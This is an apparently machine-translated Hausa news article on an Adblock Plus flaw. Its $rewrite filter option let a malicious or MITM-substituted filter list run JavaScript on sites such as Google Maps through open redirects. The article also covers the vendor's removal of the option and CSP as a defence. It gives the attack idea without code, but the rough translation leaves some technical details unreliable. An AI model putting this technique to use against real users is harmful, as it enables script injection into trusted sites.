Kwanan nan an gano cewa mashahurin talla talla «Adblock Plus »yana da rauni wanda zai ba da damar shirya aiwatar da lambar JavaScript akan shafukan, game da amfani da matatun da ba a gwada su ba waɗanda wasu kamfanoni suka shirya tare da niyya mara kyau (misali, ta hanyar haɗa tsarin doka na ɓangare na uku ko ta maye gurbin doka yayin harin MITM).
Jera marubuta tare da kayan tace na iya tsara aiwatar da lambar su a cikin mahallin shafukan yanar gizo masu damar zuwa mai amfani da dokoki tare da mai aiki »$ sake rubutawa«, wanda ke ba da damar maye gurbin wani ɓangare na URL.
Ta yaya wannan aiwatar da lambar zai yiwu?
Sanarwa na $ sake rubutawa baya bada damar maye gurbin mai masaukin a cikin url, amma yana ba da dama don sasanta muhawarar na bukatar.
Duk da haka, lambar aiwatarwa za a iya cimma. Wasu shafuka, kamar Google Maps, Gmail, da Google Images, suna amfani da dabarar ɗora Kwatancen aiwatar da ayyukan JavaScript wanda aka watsa su ta hanyar rubutu mai haske.
Idan sabar ta ba da damar sake jujjuyawar buƙatun, to ana iya tura shi zuwa wani mahalarta ta hanyar sauya sigogin URL ɗin (misali, a cikin yanayin Google, za a iya sake juyawa ta hanyar API »google.com/search«) .
Baya ga rundunonin da ke ba da izinin juyawa, za ka iya kuma kai hari a kan ayyukan da ke ba da izinin wurin abun cikin mai amfani (adreshin lamba, dandalin sanya kayan rubutu, da sauransu).
Hanyar Harin da aka gabatar kawai yana shafar shafukan da ke ɗora igiyar a hankali da lambar JavaScript (misali, ta hanyar XMLHttpRequest ko Fetch) sannan a gudanar dasu.
Wani babban iyakantuwa shine buƙatar amfani da turawa ko sanya bayanan sabani a gefen sabar asalin abin da ke samar da kayan aikin.
Duk da haka, a matsayin nuna dacewar harin, yana nuna maka yadda zaka tsara aiwatar da lambar ka ta hanyar bude maps.google.com ta amfani da turawa ta hanyar "google.com/search".
A zahiri, buƙatu don amfani da XMLHttpRequest ko Fetch don zazzage rubutun nesa don gudana ba zai gaza ba yayin da aka yi amfani da zaɓin $ rewrite.
Hakanan, sake turawar yana da mahimmanci saboda yana bawa XMLHttpRequest damar karanta rubutun daga wani shafi mai nisa, duk da cewa ya fito daga tushe guda.
Tuni suna kan aiki don magance matsalar
Maganin har yanzu yana cikin shiri. Matsalar kuma ta shafi masu toshe AdBlock da uBlock. UBlock Origin Blocker ba mai saukin kamuwa da matsalar bane saboda baya tallafawa mai gudanarwar »$ sake rubutawa.
A wani lokaci, marubucin uBlock Origin ya ƙi ƙara $ rewrite tallafi, yana mai ambaton yiwuwar lamuran tsaro da kuma rashin isassun ƙuntataccen matakin rundunar (maimakon sake rubutawa, an ba da shawarar zaɓi na querystrip don share sigogin tambaya a maimakon maye gurbin su)
Hakkinmu ne mu kare masu amfani da mu.
Duk da ƙananan haɗarin gaske, mun yanke shawarar cire zabin $ sake rubutawa. Sabili da haka, za mu saki wani sabon juzu'i na Adblock Plus da wuri-wuri ta hanyar fasaha.
Muna yin wannan a matsayin kariya. Babu yunƙurin amfani da zaɓin sake rubutawa da aka yi ƙoƙari kuma za mu yi iyakar ƙoƙarinmu don hana wannan daga faruwa.
Wannan yana nufin cewa babu wata barazana ga duk wani mai amfani da Adblock Plus.
DMasu haɓaka Adblock Plus sunyi la'akari da ainihin hare-haren da basu yuwu ba, tunda duk canje-canje ga jerin ka'idoji na yau da kullun ana yin bita kuma haɗin masu amfani da jerin abubuwa na ɓangare na uku ana amfani dasu ta hanyar masu amfani sosai.
Sauya doka ta MITM yana cire amfani da HTTPS ta tsohuwa don loda jerin abubuwan toshewa na yau da kullun (don sauran jerin an shirya shi don hana saukar da HTTP a cikin fitowar ta gaba).
Don toshe hare-hare a shafukan yanar gizo, Za'a iya amfani da umarnin CSP (Manufofin Tsaron Abun Hulɗa), ta hanyar da zaku iya bayyana bayyane waɗanda za a iya ɗora albarkatun waje daga gare su.
Source: https://adblockplus.org, https://armin.dev